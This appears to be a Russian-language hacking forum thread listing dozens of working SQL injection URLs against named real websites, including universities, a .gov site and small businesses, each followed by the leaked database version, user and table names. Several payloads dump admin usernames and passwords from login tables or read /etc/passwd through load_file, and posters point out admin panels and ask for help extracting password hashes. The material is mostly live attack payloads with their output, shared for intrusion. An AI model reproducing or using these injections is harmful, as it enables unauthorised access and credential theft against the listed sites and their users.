http://exploratorium.edu/webcasts/explotv_player.php?id=-00000759+union+select+version(),2,3/*

Database Version: 5.0.33
Database name: ExploMedia
User name: MediaRead@207-7-139-21.exploratorium.edu

http://www.eored.ru/faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

Видно что есть инъекция, но запрос походу не верный ( иначе бы показался админский пасс с солью (
Помогите пожалуйста сформировать правельный...

http://www.terfeliaid.co.uk/index.php?page=4&id=35+limit+0+UNION+SELECT+1,CONCAT(version(),data base(),user()),3,4,5,6,7,8--

database Version: 5.0.22-Debian_0ubuntu6.06.11-log
database name: terfeliaid_db
user name: terfeliaid2@localhost

http://takproperty.co.uk/search.php?ref_id=&status=-&region=-&location=7+limit+0+UNION+SELECT+CONCAT(version(),d atabase(),user()),2,3,4,5--
database Version: 5.0.67-percona-highperf-b10-log
database name: takprop_takeproperty
user name: takprop_admin@localhost

http://www.wickesmedia.co.uk/site/pages/newsitem.php?id=35+UNION+SELECT+1,2,AES_DECRYPT(AE S_ENCRYPT(CONCAT(version(),database(),user()),0x71 ),0x71),4,5,6,7,8,9,10,11--

database Version: 5.0.17-standard
database name: wickesdb
user name: wickesdata@bfb1.hotchilli.net

http://www.uiartsfaculty.net/cv/showcv.php?id=-51+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3, 4,5,6,7,8,9,0,1,22--

Database Version: 5.0.81-community-log
Database name: cactilio_uifacultyofarts
User name: cactilio_ui@localhost

http://www.dhcottages.co.uk/details.php?id=35+UNION+SELECT+1,2,3,4,CONCAT(vers ion(),database(),user()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2+LIMIT+1,1--

Database Version: 4.1.22-community-nt-log
Database name: dch_admin
User name: Ravine@DSVR009974

MSSQL-Inj:
http://www.right-travel.com/travel_tips.php?id=1%27+or+1=@@version+--+

PR3 тиц100
http://www.nerungri.edu.ru/muuo/web/3/admin/index.php?page=edit&id=-8+union+select+1,2,3,4,concat_ws(0x3a,username,ema il,password),6,7,8,9,0,11+from+antoria.jos_users/*
Database Version: 5.0.32-Debian_7etch10-log
Database name: history
User name: admin@localhost

http://www.salsamoves.info/clubNight.php?clubNightID=38+union+select+1,concat (0x2a,version(),database(),user()),3,4,5,6,7,8,9,1 0,11,12,13+limit+1,1/*

4.1.22-standardsalsamov_londonsalsasalsamov@localhost

http://www.dbq.edu/news/news1.cfm?ID=423+union+select+1,2,3,4,5,6,7,8,9,10 +from+release%00

Microsoft Access

http://www.1cleaning.ru/rus/sc.php?id=-29+union+select+1,concat_ws(0x3a,user(),database() ,version()),3--
u19949@78.108.81.31:b19949:5.0.67

http://www.djz.edu.my/hjdaobao/hj.php?period=7+union+select+1,2,concat(0x3a,versi on(),user(),database()),4,5,6,7

4.1.22-standarddjzedumy_daobao@localhostdjzedumy_daobao

http://veganica.com/artists.php?typeid=1%27+and+substring(version(),1, 1)=4+/*
http://www.buywacomthai.com/th/catalog.php?typeid=3+union+select+1,concat_ws(0x3a ,version(),user(),database()),3,4,5,6+--+-

PR 8

http://www.ncsu.edu/jcraulstonarboretum/calendar/event_details.php?ID=-248+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,34/*

Database Version: 4.1.19-log
Database name: arboretum
User name: arbread@uni48ws.unity.ncsu.edu

-----------------------------------------------------------------------------------------------------------------

PR 6

http://www.cals.ncsu.edu/poultry/staff.php?content=Jim_Croom&id=-44+union+select+1,group_concat(username,0x3a,passw ord),3,4,5,6,7,8,9,0,11+from+user/*

Database Version: 4.1.19-log
Database name: ps_cms
User name: ps_cms_admin@uni47ws.unity.ncsu.edu

--------------------------------------------------------------------------------------------------------------------------

PR 4

http://omega.physics.uiowa.edu/DOE06/Pages/Page.php?Id=-2+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*

Database Version: 4.1.22
Database name: DOE_WEB
User name: root@localhost

---------------------------------------------------------------------------------------------------------------------------------

PR 4

http://genetics.uiowa.edu/people/detail.php?id=-143+union+select+version(),2,3,4,5,6,7,8,9,0,1,12/*

PR 4

http://csbl.bmb.uga.edu/uber/display_species.php?id=-82+union+select+version()/*

Database Version: 4.0.18
Database name: Uber
User name: uber@csbl.bmb.uga.edu

http://www.film-commission-bayern.de/index.php?SeitenID=12+union+select+1,2,3,4,5,6,con cat_ws(0x2a,version(),database(),user()),8,9,10

5.0.32-Debian_7etch8-log*fff_location*fff_location_w@localhost


http://www.maarav.org.il/classes/PUItem.php?id=127+union+select+1,2,concat(0x3a,ver sion(),user(),database()),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+limit+1,1


-communitymaaravo_maarav5@localhostmaaravo_maarav5

PR 5

http://bethhart.org/band.php?id=3+union+select+1,version(),3,4,5,6,7--

Database Version: 5.0.67-community-log
Database name: bethhart_com_site
User name: hartmass@bethhart.com

http://www.stanki43.ru/index.php?id=-14+union+select+1,2,3,unhex(hex(version())),5,6,7--

4.1.18-log:stanki43:teho_us1@localhost

PR 4
http://ukrainianlawfirms.com/firms.php?id=-023+union+select+1,version(),3,4,5/*

Database Version: 5.0.44-log
Database name: ukrainianlaw
User name: u_ukr_law@localhost

-----------------------------------------------------------------------------------------------------------------

http://www.mightbegood.net/fluent/linkcat.php?id=2+union+select+version(),2,3--

Database Version: 5.0.81-community-log
Database name: fluentco_fluent
User name: fluentco_admin@localhost

http://www.gtk.fi/slr/printable.php?id=18+union+select+1,concat_ws(0x2a, version(),database(),user()),3,4,5,6,7,8,9,10,11+l imit+1,1


5.0.45 slr slr@localhost

http://www.cacma.org/index.php?c=noti.php&id=-79+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,d atabase(),version(),user()),11,12,13,14,15,16--

web17_db1:5.0.20-Debian_1-log:web17_u1@localhost

http://www.vistazo.com/webpages/pais/index.php?id=-6641+union+select+1,2,concat_ws(0x3a,database(),ve rsion(),user()),4,5,6,7,8,9,10,11,12,13,14,15--

vistazoc_9:4.1.22-standard:vistazoc_admin@localhost

http://www.tparazitolderg.org/similar.php3?id=102+union+select+1,concat(0x3a,ver sion(),user(),database())+limit+1,1

http://travel.chinavista.com/talk/view.php3?Itemid=189+union+select+1,concat_ws(0x2a ,version(),database(),user()),3,4,5,6,7,8,9,10,11, 12+limit+1,1


5.0.45 Forum dedop@localhost

http://www.utahstorytellingguild.org/chapters.php?id=-8+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9+from+mysql.user/*

Database Version: 4.1.22
Database name: usg
User name: barryw@localhost

http://www.ledoux.com.uy/productos_ing.php?id=1&cod=-31+union+select+1,2,concat_Ws(0x3a,user(),database (),version()),4,5,6,7--

ledoux_ledoux@localhost:ledoux_ledoux:5.0.67-community

http://www.optiputer.net/events/presentation_temp.php?id=11+union+select+1,2,3,4,5 ,6,version(),8,9,0,1,2,3,4,15+from+mysql.user/*
Database Version: 4.0.27
Database name: calit
User name: calit2user@localhost

http://www.cambridgefolkfestival.co.uk/artists/biographies.php?id=35+union+select+1,concat(versio n(),database(),user()),3,4,5--

database Version: 4.1.22
database name: cambridgefolk
user name: cambridgefolk@localhost

http://www.activeagency.co.uk/artist.php?id=35+union+select+1,concat(version(),d atabase(),user()),3,4,5,6,7,8,9,10,11--
database Version: 5.0.81-community
database name: fran_activeagency
user name: fran_franaa@localhost

http://www.arpi-sibir.ru/seminar.php?id=-15'+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8/*
arpi@localhost:5.0.45:arpi_sibir



http://www.izmiran.rssi.ru/catalog?id=-15+union+select+1,2,unhex(hex(concat_ws(0x3a,user( ),version(),database()))),4--
catalog@localhost:4.1.14:catalog



http://www.psychiatry.ru/lib_show.php?id=15+union+select+1,2,3,4,concat_ws( 0x3a,user(),version(),database()),6--
yfilehljv_ncpz@212.193.224.10:4.1.22:yfilehljv_ncp z

www.sovtest.ru
http://www.sovtest.ru/news.php?id=-197+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8--
Версия 4.1.18-standard-log

П.С вывод в сааамом низу страницы

========================


www.astrakhanfm.ru
http://www.astrakhanfm.ru/news/news.php?id=-15942+union+select+1,2,3,4,version(),6,7--
Версия 4.0.24-stan

http://www.mmaspot.net/news.php?id=-605'+union+select+1,version(),3,4,5,6,7+from+user/*

Database Version: 5.0.45
Database name: mmaspot_vb
User name: mmaspot_vb@localhost

---------------------------------------------------------------------------------------------------------

PR 7
http://www.arthistoricum.net/index.php?id=276&ausgabe=2009_07&review_id=-13611+union+select+version()/*

Database Version: 5.0.44
Database name: usr_p101264_2
User name: p101264d2@172.17.110.14

http://www.radmarkt.de/rm/content/home/news.php?id=-974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16--
User = bva_radmarkt@hera.bva-bielefeld.de
Database = bva_radmarkt
Version = 4.1.20

http://udmurtiya.org/view.php?id=-1%27+union+select+1,2,3,4,5,6,version(),8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+

http://atn.kharkov.ua/gallery_view.php?idf=-267+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8--

Database Version: 5.0.45-log
Database name: site
User name: atn@localhost

http://vecherniy.kharkov.ua/archive_paper/?y=2009&n=-89+union+select+1,concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14--

Database Version: 5.0.51a-24-log
Database name: newvecherka
User name: u_newvecherk@localhost

http://www.worldsteel.org/?action=faqlist&id=6+union+select+1,2,concat(0x2a,version(),databa se(),user()),4,5,6/*

version:4.1.20
database:admin_appl
user:worldsteelorg@localhost

http://www.mybart.org/about_mybart/refer/index.php?s=about_mybart_nav&destid=1+union+select+1,2,aes_decrypt(aes_encrypt( concat_ws(0x2a,version(),database(),user()),0x71), 0x71),4,5,6,7,8,9,10,11,12,13,14,15,16+limit+1,1/*

version:5.0.18
database:log mybart
user:mail@10.10.11.73

http://vesti.portal.kharkov.ua/vesti.php?item=-1%27+union+select+1,version(),3,4,5,6,7,8,9%20%27--
Database Version: 5.1.28-rc

Сайт природного заповедника Куркино http://www.oopt-kurkino.ru/

Уязвимый скрипт: http://www.oopt-kurkino.ru/p8/index.php?r=news&nid=223+and+0+union+select+1,2,3,4,5,6,7,8,9,10--+

Версия БД: 5.0.45
Имя БД: oopt_kurkino_ru
Юзер: ooptkurkinoru@localhost
ОС: redhat-linux-gnu
File_priv: нет
Доступ к mysql.user: нет

Информация об админе:
http://www.oopt-kurkino.ru/p8/index.php?r=news&nid=223+and+0+union+select+1,2,concat_ws(0x3a,hash ,last,ip,c),4,5,6,7,8,9,10+from+cns_adminsessions--+

http://www.hankookfa.com/view.php?num=-418+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9/*
pr2

http://www.ipcc.cma.gov.cn/Website/index.php?WCHID=30+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,version(),user(),database()),0x7 1),0x71),2,3,4/*

5.0.18root@localhostipcc_cma_gov_cn

Razzie Awards(Официальный сайт премии «Золотая малина»)

MS Access

http://razzies.com/asp/directory/XcDirViewRatings.asp?LinkID=1193+union+select+null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null+from+????
Скуля есть,но какие там таблицы хз. Знаю что стоит XcNewsPlus,так же есть web wiz forum,но его таблицы в другой базе,так что тоже надо подбирать.Если кто сможет,раскрутите)

PR3

http://www.sgb-cisl.it/sites/wir_gremiumdetails.php?lang=de&id_gremienkategorie=-1+and+1=1+UNION+SELECT+concat_ws(0x3a,version(),us er(),database())

5.0.45-log:sgbcisl@localhost:sgbcisl

http://www.unitedland.ru/news.php?id=-6+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--

caption_land:5.0.81-community:caption_merk@localhost



http://www.elios-nsk.ru/prod_info.php?id=-9640+union+select+1,2,concat_ws(0x3a,database(),ve rsion(),user()),4,5,6,7,8,9,10,11,12,13--

inetsruq_elios:5.0.81-community-log:inetsruq_elios@localhost

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,3--+

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,concat_ws(0x3a,user(), version(),database(),@@version_compile_os)--+

User:dart@localhost
database:dartklient
version:5.0.58-log
OS:redhat-linux-gnu
доступ к mysql.user: нет
file_priv: нет

http://www.tan-jurist.ru/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10--
Database Version: 5.0.67-log
Database name: u25507
User name: u25507@10.10.223.201

http://www.uvic.ee/prodfull.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

Database(): d1894sd5697
User(): d1894sa9657@z135.zone.ee
Version(): 5.1.35
OS: unknown-linux-gnu
File_priv: Нет
Доступ к mysql.user: Нет

Интересные таблицы не нашел. Доступ к админке ограничен через .htaccess
http://www.uvic.ee/admin

http://www.ru-host.ru/next.php?id=3-3%20union%20select%201,group_concat(column_name)%2 0from%20information_schema.columns%20where%20table _name=0x686f73745f6e657773--

Хостер =) 5 версия...

Джокестар, если боян минус не ставь... Антибоян не работает временно

http://www.subco.org/sc.php?src=entry&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13/*
subco@localhost:subco:5.0.45

http://www.norvellgroup.com/property-offered-charleston-sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5
norvell_cms@localhost:norvell_cms:4.1.22-standard-log

http://209.172.57.37:8080/smsmanager/smsuser/welcome.jsp?np=addressbook&v=2&KEYID=-1+union+select+1,2,3,4,5,6

http://www.clontarfflorist.com/shopping/sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5clonta1_doug@web9.hosting365.ie:cl onta1_SHOP:5.0.45-community-log

http://www.climamaison.com/gp_produit.php?Prod=71+union+select+1,concat_ws(0x 2a,version(),user(),database())

5.0.32-Debian_7etch10-log climamaisoncom@localhost climamaisoncom

http://www.gmb-tuning.nl/index.php?p=Nieuws&id=80+union+select+1,2,3,4,5,concat_ws(0x2a,versio n(),database(),user()),7

5.0.32-Debian_7etch6-log gladershop_gmb gladershop_gmb@localhost

http://www.skidkivtule.ru/advices.php?id=20&row=-89+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6/*
Database Version: 4.1.22-log
Database name: wwwskidkivtuleru
User name: skidkivt@localhost

http://www.kfp.com.ua/vippred_info.php?id=19+union+select+1,2,concat_ws( 0x3a,version(),database(),user())+limit+1,1/*
Database Version: 4.0.27-standard-log
Database name: VKFK
User name: vkfk@localhost

http://www.parta.kiev.ua/club/index.php?show=ank&id=-599+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38--
Database Version: 5.0.51a-community
Database name: photoua_parta
User name: photoua_parta@localhost

www.smirs.com он-лайн шоп часов
Blind SQL inj

http://www.smirs.com/product_info.php?products_id=340+and+substring(ver sion(),1,1)=4/*
4ая ветка

http://www.tdrz.ru/next.php?id=84%20union%20select%20version()--

Database Version: 5.0.32-Debian_7etch8
Database name: tdrzru
User name: tdrzru@localhost

ТИЦ: 10
PR: 4

http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,datab ase(),version(),user()),9,10--

kanda_kandadb:5.0.45:kanda@70.32.114.77
вывод в заголовке
http://www.kanda.com/admin/login.php

http://www.polihim.info/products/list.php?id=13-13%20UNION+SELECT%20concat_ws(0x3a,login,password) %20FROM+polihim.access--

Выводит логин и пароль =) (выкладывать правила запрещают =))
И если поковырять то можно еще хеш от форума вобловского отрыть...

Админка: http://www.polihim.info/adm/

Ах да.

Version: 5.0.77
name: polihim
User name: art@localhost

http://www.stvasilios.org/news/article.php?id=-580+union+select+1,version(),3,4,5/*

Database Version: 5.0.45-community-nt
Database name: stvasilios
User name: parstvasilios@vmwinhost2.inetmin

Кинотеатр "Космос", г. Новосибирск
http://www.kosmos-nsk.ru/index.php?page=film&id=-451+union+select+1,2,3,4,5,concat_ws(0x3a,database (),user(),version()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20
kosmos_base:kosmos_user@localhost:5.0.45

mssqli
http://www.tuoteuutiset.fi/info.cfm/id/38/mag/2+or+1=@@version--
version()
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() [tuxml]
system_user [www]
tables:
bannerJoin
brand
additionalNews
company
companyBrandJoin
companyDescription
companyDigital
companyDigitalLog
companyEmail
companyInfo
companyJoin
companyProductTypeJoin
companySearch
companyUrl
companyWhitePaper
contact
contactCompany
customerEmailFailed
customerEmails
dtproperties
event
eventJoin
expertArticle
holddups
infoBase
infoBaseJoin
infoBaseRows
itemViews
keyaccount
link
linkGroup
linkGroupJoin
linkJoin
magazine
magazineIssues
magazineOrders
news
newsJoin
newsletter
newsProductTypeJoin
nimppari
pdf
picture
product
productClass
productClassJoin
productData
productJoin
productProductTypeJoin
productProductTypeJoinHoldKey
productType
productTypeJoin
rating
spotNews
spotNewsGroup
spotNewsJoin
sysconstraints===================================
http://www.proventilation.com/products/productDetail.asp?id=9+or+1=@@version--
version()
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [uniwashInc]
system_user [uniwashInc]
tables:
tblRepLogin
D99_Tmp
dtproperties
FORUM_A_REPLY
FORUM_A_TOPICS
FORUM_ALLOWED_MEMBERS
FORUM_BADWORDS
FORUM_CATEGORY
FORUM_CONFIG_NEW
FORUM_FORUM
FORUM_GROUP_NAMES
FORUM_GROUPS
FORUM_MEMBERS
FORUM_MEMBERS_PENDING
FORUM_MODERATOR
FORUM_NAMEFILTER
FORUM_REPLY
FORUM_SUBSCRIPTIONS
FORUM_TOPICS
FORUM_TOTALS
MSysCompactError
sysconstraints
syssegments
tblActualApplication
tblApplication
tblApplicationMachine
tblApplicationType
tblBullets
tblComments
tblCustomer
tblCustomModel
tblDetail
tblDrawings
tblItemList
tblItemListTemp
tblItemXref
tblLinks
tblLogin
tblMemberships
tblMisc
tblModel
tblModel2
tblNewProduct
tblProductAppXref
tblProductHeader
tblProducts
tblProductType
tblProductTypes
tblProductXref
tblProImage
tblQuote
tblQuoteModel
tblQuoteOption
tblRepCustomer
tblRepEmail
tblRepModelXref
tblSalesData
tblSalesData2
tblTestamonials
tblTradeShows
tblUBEmail
http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(id+ as+nvarchar)%2B%27%3A%27%2Bcast(firstName+as+nvarc har)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from +tblLogin)--http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(ID+ as+nvarchar)%2B%27%3A%27%2Bcast(userName+as+nvarch ar)%2B%27%3A%27%2Bcast(passwords+as+nvarchar)+from +tblRepLogin)--===================================
http://www.auspirit.com/au/aspirit/productdetail.asp?ID=40+or+1=@@version--
version()
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [vs112407_1]
system_user [vs112407_1_dbo]
tables:
tliBannerInstance
tblMMClickThru
tliSeminarDate
AusSpirit
dtproperties
SASImport
SASImportold
sysconstraints
syssegments
tblMMAccountFields
tblMMAccounts
tblMMAdminRights
tblMMAdminSections
tblMMClient
tblMMFieldContent
tblMMFieldTypes
tblMMImailHistory
tblMMScheduleSend
tblMMStat
tblMMTemplates
tblMMUsers
tblREmailAdministrators
tblREmailMemberVariants
tblREmailServiceMembers
tblRVariantContent
tblRVariantTypes
tldImail1_1ContentFolder
tldImail1_1DataBase
tldImail1_1EmailContent
tldImail1_1MailQue
tldImail1_1Members
tldImail2_2ContentFolder
tldImail2_2DataBase
tldImail2_2EmailContent
tldImail2_2MailQue
tldImail2_2Members
tliAdministrator
tliAdvertisement
tliAffiliate
tliAffiliateReference
tliAPTMSCompany
tliAPTMSLocation
tliAPTMSProduct
tliAuctionBids
tliAuctionCategory
tliAuctionClient
tliAuctioneerPermission
tliAuctionFeedback
tliAuctionIncrement
tliAuctionItem
tliAuctionMessage
tliAuctionOrder
tliBanner
tliBannerPosition
tliBannerTemplate
tliBannerType
tliBidType
tliBlog
tliBlogComment
tliBranchDomain
tliBrand
tliCartCustomer
tliCartOrder
tliCartPayment
tliCategory
tliContentItem
tliContentType
tliCourse
tliCruiseBooking
tliCruiseCrew
tliCruiseDate
tliCruiseSchedule
tliCurrencyConverter
tliDataPage
tliDataPageState
tliEMailClickThrough
tliEMailContent
tliEMailContentInstance
tliEMailDump
tliEMailQue
tliEMailTemplate
tliEvent
tliExchangeRates
tliForum
tliForumComment
tliForumThread
tliForumTopic
tliForumUser
tliGeneralPage
tliGeneralPageCategory
tliGMTDestination
tliGMTProduct
tliImailEmail
tliImailEmailPart
tliIndigoMenuItem
tliIndigoSummaryItem
tliIndigoSummaryItemButton
tliIndigoSummaryItemEntry
tliItinerary
tliLawFirm
tliMember
tliMemberExpertise
tliMemberGroup
===================================
http://www.chemdot.com/productdetail.cfm?id=288+or+1=@@version--
version()
Microsoft SQL Server 7.00 - 7.00.842 (Intel X86) Mar 2 2000 06:49:37 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [chemdot]
system_user [NT AUTHORITY\SYSTEM]
tables:
REFERENTIAL_CONSTRAINTS
CHECK_CONSTRAINTS
admin===================================
http://www.sooknet.com/technology/news.cfm?ID=5620+or+1=@@version--
version()
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name() [sooknet2]
system_user [itssook]

http://www.buddhistac.org/nkn_include/nknfiledn.php?uid=1+union+select+aes_decrypt(aes_e ncrypt(concat_ws(0x2a,version(),user(),database()) ,0x71),0x71),2,3,4,5

5.0.27 budac@localhost budac


http://www.ndt.net/search/docs.php3?id=7516+union+select+concat_ws(0x2a,vers ion(),user(),database())+limit+1,1/*


5.0.24 nondestructive@localhost ndtnet

http://www.olehouse.ru/gost/vid.php?id=-771%20union%20select%201,2,3,4,5,6,7,8,9,10,versio n(),12,13,14,15,16--

4 версия

http://www.riai.ie/?id=-5755+union+select+1,2,concat_ws(0x3a,database(),ve rsion(),user()),4,5,6,7,8,9--

bh002:5.0.45-community-log:user2bh002@web4.hosting365.ie

http://www.x-trapromo.gr/category.php?id=-20+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4--

x_trap_phpbb:5.0.32-Debian_7etch8:xtra@localhost

http://psea.eu/index.php?id=-5+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,databa se(),version(),user()),9,10,11,12,13,14,15--

pseaeu_psea:5.0.81-community: pseaeu_axtinog@localhost

http://www.csa.edu.au/staff_bio.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user ()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+--+
5.0.82-msl-usrs-sure2-log:csaadmin@localhost
ТИЦ: 0
PR: 6
На антибоян проверял Google'ом

http://nilespring.com/girl.php?id=-137%20union%20select%201,group_concat(table_name)% 20from%20information_schema.tables--

Опять порнуха..

http://www.aramis-london-escorts.co.uk/girl.php?s=elite&id=-25+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3, 4,5,6
Database Version: 5.0.67-log
Лондонский бардель
Проверял на антибоян Гуглом

http://www.blackwood.ru/main.php?id=-1+union+select+version(),2,3

database version:
5.0.83-log
гуглом на антибоян проверил , вроде не чо не нашло)

http://www.stphilips.org.au/staff_bio.php?id=-40%20union%20select%201,2,3,version(),5,6,7,8,9,10 ,11,12,13,14,15,16,17--

4.1.22-standard

http://www.cempre.org.uy/pages/noticia.php?id=-76+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11--

tangram0_cempre@localhost:tangram0_cempre:5.0.67-community


http://www.tiendadigital.com.uy/cuentale.php?Accion=Producto&Id=-76+union+select+1,concat_Ws(0x3a,user(),database() ,version()),3--

tiendadigital@marv.dreamhost.com:tiendadigital:5.0 .67-log


http://www.saico.com.uy/noticia.php?id=76'+and+substring(version(),1,1)=3/*

3-ветка



http://www.inmobiliariaps.com.uy/imprimir.php?id=-76+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,version(),21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79 ,80,81,82,83,84--

5.0.81-community

http://philatelia.ru/literature/plots/?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( )%20,version()),4,5,6,7,8,9,10

karasiuk@localhost:karasiuk:4.1.25

http://www.subba-culture.com/competitions.php?id=-1075+union+select+1,password,3,4,5,6,7,8,9,0,1,2,1 3+from+users/*

Database Version: 4.0.27-max-log
Database name: db131994193
User name: dbo131994193@212.227.119.142

-------------------------------------------------------------------------------------------------------------------

http://maindata.info/index.php?id=-24+union+select+version()+from+users/*

Database Version: 4.0.27-standard
Database name: maindatask
User name: maindatask@10.2.194.84

http://itjapan.chosun.com/viewPopupInfo.do?idx=1+union+select+1,2,concat_ws( 0x2a,version(),user(),database()),4,5,6,7,8,9,10,1 1,12,13,14

5.0.45-log academy@localhost academy
--------------------------------------------------------------------------------------------------------------------

http://www.st-johann-erding.de/index.php?page_id=46+union+select+concat_ws(0x3a,v ersion(),user(),database())/*

4.1.22 10031_sismedia@localhost 10031_sismedia
--------------------------------------------------------------------------------------------------------------------
http://www.digitalsignagetoday.com/product_cat_search.php?cat=1+union+select+1,concat (0x2,version(),user(),database()),3,4,5,6,7/*

5.0.45atmmarketplace@localhostsitedb

http://www.wemu.org/hosts.php?id=-38+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9/*
Database Version: 4.1.22-max-log
Database name: wemufm
User name: wemufm@68.178.254.9

http://vologda-address.ru/index.php?cat=31&subcat=781+union+select+1,2,concat_ws(0x3a,version (),database(),user()),4,5/*
Database Version: 5.0.26-log
Database name: davletshin_volog
User name: davletshin_volog@localhost

http://www.green-furniture.ca/item_details.php?id=-76+union+select+1,2,3,4,concat_Ws(0x3a,user(),data base(),version()),6,7,8,9,10,11,12,13--&name=GF-S26+Sofa

greenfuri@localhost:ricknel_greenfur:5.0.83




http://iidx.jp/gf/req/view.php?id=76+union+select+1,2,3,4,concat_Ws(0x3a ,user(),database(),version()),6,7--

excelion@localhost:excelion:4.0.27-standard

http://www.watercampus.com/index.php?menu_item_id=11+union+select+concat(0x2, version(),user(),database())+limit+1,1

5.0.37-community-ntwww@localhostwatercampws

http://lumion.ru/low.php?id=9-9%20union%20select%201,2,3,4,concat_ws(0x3a,id,use r,pass)%20from%20userlist%20limit%200,1--

Админку не нашел...

http://www.cfc-nj.com/news.php?id=-191+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15--
5.0.51a-log

http://www.jempartners.ch/ita/news.php?id=1191+and+substring(version(),1,1)=5

http://www.comp.polyu.edu.hk/contentpage.php?id=20060912163908+union+select+con cat(0x3,version(),user(),database()),2,3,4

5.0.37wwwuser@csns312.comp.polyu.edu.hkwww

PR 6
http://www.music.msu.edu/people/detail.php?id=30+union+select+1,2,3,4,5,6,password ,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,43+from+tbl_admin+limit+1,1--

5.1.34-community-log

------------------------------------------------------------------------------------------------------

PR 7
http://www.imsports.msu.edu/clubs/clubDisp.php?id=-29+union+select+1,table_name,version(),4,5,6,7,8,9 ,0,11+from+information_schema.tables+limit+1,1--

5.0.81-community

http://www.cineclubilraggioverde.it/archivio/iniziativa.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pwd),4,5,6, 7,8,9,0,1,12+from+login/*

Database Version: 4.1.22-standard-log
Database name: cineclubilraggioverde_it_cico
User name: CZ72_cico@81.88.49.20

http://www.dvoa.us.orienteering.org/info/news.php?id=-495+union+select+version(),table_name+from+informa tion_schema.tables+limit+17,69--
pr4

http://www.thlib.org/avarch/mediaflowcat/staffmember_details.php?id=354+union+select+1,2,co ncat(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+limit+1,1/*


5.0.45dln4n_mediaflowcat_utf8dln4n@sds3.itc.Virgin ia.EDU

http://www.blackcd.ru/php/content.php?id=-5746'+union+select+1,2,3,4,5,version(),7,8,9,0,1,2 ,3,4,5,6,17/*

Database Version: 5.0.32-Debian_7etch10-log
Database name: leontyev_blcd
User name: leontyev_blcd@77.221.130.5

.gov
http://www.winchesterva.gov/news.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8
root@localhost:winccms:4.1.20

